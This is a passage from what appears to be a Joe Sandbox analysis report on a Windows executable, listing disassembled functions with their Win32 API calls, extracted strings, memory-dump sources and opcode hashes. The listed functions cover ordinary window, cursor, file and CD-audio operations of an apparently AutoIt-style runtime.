                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                    • API String ID: 1038674560-1810252412
                                                                                                                    • Opcode ID: 0be652e8f8df24896c9cc231ab346cdaf826521001df3c77fa8b54c0aa013817
                                                                                                                    • Instruction ID: 477423ef759cd501d315f456e9bd403f4bd04b7b5e35632225d7c16abcb015ac
                                                                                                                    • Opcode Fuzzy Hash: 0be652e8f8df24896c9cc231ab346cdaf826521001df3c77fa8b54c0aa013817
                                                                                                                    • Instruction Fuzzy Hash: 7931A33294861ABADB27FB60ED03EEE77A4AF10750F60402AF445B92D1FF656F04C652
                                                                                                                    Function 00394FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00395013
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0039501E
                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00395029
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00395034
                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0039503F
                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0039504A
                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00395055
                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00395060
                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0039506B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00395076
                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00395081
                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0039508C
                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00395097
                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 003950A2
                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 003950AD
                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 003950B8
                                                                                                                    • GetCursorInfo.USER32(?), ref: 003950C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$Load$Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2577412497-0
                                                                                                                    • Opcode ID: 416c1e471c210b6358f60a41b8d6f6bd0ca66932b84f1ca4eef7e82105d01578
                                                                                                                    • Instruction ID: e4fa7e85de101aa3b07bd6a904c1af5a74e19f6024f17d74534882f41da73021
                                                                                                                    • Opcode Fuzzy Hash: 416c1e471c210b6358f60a41b8d6f6bd0ca66932b84f1ca4eef7e82105d01578
                                                                                                                    • Instruction Fuzzy Hash: BF3103B1D483196ADF119FB68C8996FBFE8FF04750F50452AE50DE7280DA78A5408F91
                                                                                                                    Function 003AA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003AA259
                                                                                                                    • DestroyWindow.USER32(?,?), ref: 003AA2D3
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003AA34D
                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003AA36F
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AA382
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 003AA3A4
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00320000,00000000), ref: 003AA3DB
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AA3F4
                                                                                                                    • GetDesktopWindow.USER32 ref: 003AA40D
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 003AA414
                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003AA42C
                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003AA444
                                                                                                                      • Part of subcall function 003225DB: GetWindowLongW.USER32(?,000000EB), ref: 003225EC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                    • API String ID: 1297703922-3619404913
                                                                                                                    • Opcode ID: c935dd327f8eea9b533be7e464ccfa4108c5b0a553028fb064090e169dc36965
                                                                                                                    • Instruction ID: d5d2a3cd6d9e71af5beb0250e798004425e98d1c897b48ba70178dad55e2d2bc
                                                                                                                    • Opcode Fuzzy Hash: c935dd327f8eea9b533be7e464ccfa4108c5b0a553028fb064090e169dc36965
                                                                                                                    • Instruction Fuzzy Hash: D671BF76140644AFD726DF28CC49F6A7BE9FB8A304F05452DF9858B3A0D771E902CB52
                                                                                                                    Function 003A4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 003A4424
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003A446F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                    • Opcode ID: a37fa7e890cf7016c27d7ebcd82937e2a526e271eaf61fe7da5f54bba14d023b
                                                                                                                    • Instruction ID: 29bf95b26fa0c74068fd7b9d485bc9e049231b981a0f1a7feabac2d613d0349e
                                                                                                                    • Opcode Fuzzy Hash: a37fa7e890cf7016c27d7ebcd82937e2a526e271eaf61fe7da5f54bba14d023b
                                                                                                                    • Instruction Fuzzy Hash: CC918D356043119FCB06EF10D451A6EB7E1EF9A350F05886AF89A5F7A2CB74ED09CB81
                                                                                                                    Function 003AB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003AB8B4
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003A91C2), ref: 003AB910
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AB949
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003AB98C
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AB9C3
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 003AB9CF
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003AB9DF
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,003A91C2), ref: 003AB9EE
                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003ABA0B
                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003ABA17
                                                                                                                      • Part of subcall function 00342EFD: __wcsicmp_l.LIBCMT ref: 00342F86
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                    • API String ID: 1212759294-1154884017
                                                                                                                    • Opcode ID: 9e29332c3b4d38aa5a50f60587532db700512296913fea9c31b5cde1aff84d63
                                                                                                                    • Instruction ID: 13f0d2b9d15a45b304fb8dd93b8daa69977bb6c52d6f32781f4107fec5ee7689
                                                                                                                    • Opcode Fuzzy Hash: 9e29332c3b4d38aa5a50f60587532db700512296913fea9c31b5cde1aff84d63
                                                                                                                    • Instruction Fuzzy Hash: A461EE71900215BEEB16DF64DC41FBFB7ACEB0A710F10411AF915DA1D2DB74A980D7A0
                                                                                                                    Function 0038DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0038DCDC
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0038DCEC
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0038DCF8
                                                                                                                    • __wsplitpath.LIBCMT ref: 0038DD56
                                                                                                                    • _wcscat.LIBCMT ref: 0038DD6E
                                                                                                                    • _wcscat.LIBCMT ref: 0038DD80
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0038DD95
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038DDA9
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038DDDB
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038DDFC
                                                                                                                    • _wcscpy.LIBCMT ref: 0038DE08
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0038DE47
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 3566783562-438819550
                                                                                                                    • Opcode ID: 2e01382a1561b330dfb8089d1150f8e456c696a0826133496f9a288a188def66
                                                                                                                    • Instruction ID: 1bd9102cfd4b87aceadf0dbb709eb304590a4b38e05d08bd2917db43911e7f14
                                                                                                                    • Opcode Fuzzy Hash: 2e01382a1561b330dfb8089d1150f8e456c696a0826133496f9a288a188def66
                                                                                                                    • Instruction Fuzzy Hash: 7E619B725043059FCB11EF60D844AAEB3E8FF89310F04496EF999DB291EB31E945CB92
                                                                                                                    Function 00389C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00389C7F
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00389CA0
                                                                                                                    • __swprintf.LIBCMT ref: 00389CF9
                                                                                                                    • __swprintf.LIBCMT ref: 00389D12
                                                                                                                    • _wprintf.LIBCMT ref: 00389DB9
                                                                                                                    • _wprintf.LIBCMT ref: 00389DD7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 311963372-3080491070
                                                                                                                    • Opcode ID: bf8dd66bbef0ef6a8d4df75c964edfebf514580876beb7dd8db3e28fb3c5f915
                                                                                                                    • Instruction ID: aff88f1794939511277faaffaf97e1f12c49cfc44a2db5a3683730243601f2d5
                                                                                                                    • Opcode Fuzzy Hash: bf8dd66bbef0ef6a8d4df75c964edfebf514580876beb7dd8db3e28fb3c5f915
                                                                                                                    • Instruction Fuzzy Hash: F8517032900619AACF16EBE0ED86EEEB778BF14300F100566F5057A1A1DB352F58DB50
                                                                                                                    Function 0038A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0038A3CB
                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0038A418
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038A460
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038A497
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038A4C5
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 2698844021-4113822522
                                                                                                                    • Opcode ID: d0a660bbed408f167b15617bae9870607201fd9a8238aeab254cbf822a029d2b
                                                                                                                    • Instruction ID: 131ebf866a59f350553cf80be99db3fc2e637cd2900bca6d085d62995d2cba47
                                                                                                                    • Opcode Fuzzy Hash: d0a660bbed408f167b15617bae9870607201fd9a8238aeab254cbf822a029d2b
                                                                                                                    • Instruction Fuzzy Hash: E7517F761047159FC706EF11D89196AB3E8FF85718F10486EF8899B361DB31EE09CB92
                                                                                                                    Function 0037F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0035E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0037F8DF
                                                                                                                    • LoadStringW.USER32(00000000,?,0035E029,00000001), ref: 0037F8E8
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0035E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0037F90A
                                                                                                                    • LoadStringW.USER32(00000000,?,0035E029,00000001), ref: 0037F90D
                                                                                                                    • __swprintf.LIBCMT ref: 0037F95D
                                                                                                                    • __swprintf.LIBCMT ref: 0037F96E
                                                                                                                    • _wprintf.LIBCMT ref: 0037FA17
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0037FA2E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 984253442-2268648507
                                                                                                                    • Opcode ID: 09df387d537b6167bdc029028538249859a22eb9ae76d2a0a9346a3d39ec6ca1
                                                                                                                    • Instruction ID: efc3959f618d3e6ef5cffec0a0471a2a08c0ffa3c73f9992eafa340b83d0398a
                                                                                                                    • Opcode Fuzzy Hash: 09df387d537b6167bdc029028538249859a22eb9ae76d2a0a9346a3d39ec6ca1
                                                                                                                    • Instruction Fuzzy Hash: 71410F72804129AACF16FFE0ED86DEE7778AF15300F500465F509BA1A1EB356F49CB61
                                                                                                                    Function 003ABA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003A9207,?,?), ref: 003ABA56
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABA6D
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABA78
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABA85
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 003ABA8E
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABA9D
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 003ABAA6
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABAAD
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABABE
                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,003B2CAC,?), ref: 003ABAD7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 003ABAE7
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 003ABB0B
                                                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003ABB36
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 003ABB5E
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003ABB74
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3840717409-0
                                                                                                                    • Opcode ID: 40f5bfdb26d6da46fb08e499110791ead7c64a2013f07450e7e77ac7e1de22f9
                                                                                                                    • Instruction ID: 867d83050b184cd81961f980a1d060e9aa39073fda3781bb3148f91b8ba85caf
                                                                                                                    • Opcode Fuzzy Hash: 40f5bfdb26d6da46fb08e499110791ead7c64a2013f07450e7e77ac7e1de22f9
                                                                                                                    • Instruction Fuzzy Hash: 54412675600208EFDB229FA5DC88EAABBBCFF8A711F104168F905D7261D7349E01CB60
                                                                                                                    Function 0038D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __wsplitpath.LIBCMT ref: 0038DA10
                                                                                                                    • _wcscat.LIBCMT ref: 0038DA28
                                                                                                                    • _wcscat.LIBCMT ref: 0038DA3A
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0038DA4F
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038DA63
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0038DA7B
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0038DA95
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038DAA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 34673085-438819550
                                                                                                                    • Opcode ID: 3a4f7982acb65ebafada1240e0de4ef93d64ea75a241fadfaca4de38d046605c
                                                                                                                    • Instruction ID: 2b2295dc05660ed9d8673864fd229b254398191047b109e81d056cf978591e32
                                                                                                                    • Opcode Fuzzy Hash: 3a4f7982acb65ebafada1240e0de4ef93d64ea75a241fadfaca4de38d046605c
                                                                                                                    • Instruction Fuzzy Hash: B88182715043419FCB26FF64C844A6AB7E8BF89310F19486EF889DB291E734DD45CB52
                                                                                                                    Function 003AC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003AC1FC
                                                                                                                    • GetFocus.USER32 ref: 003AC20C
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 003AC217
                                                                                                                    • _memset.LIBCMT ref: 003AC342
                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003AC36D
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 003AC38D
                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 003AC3A0
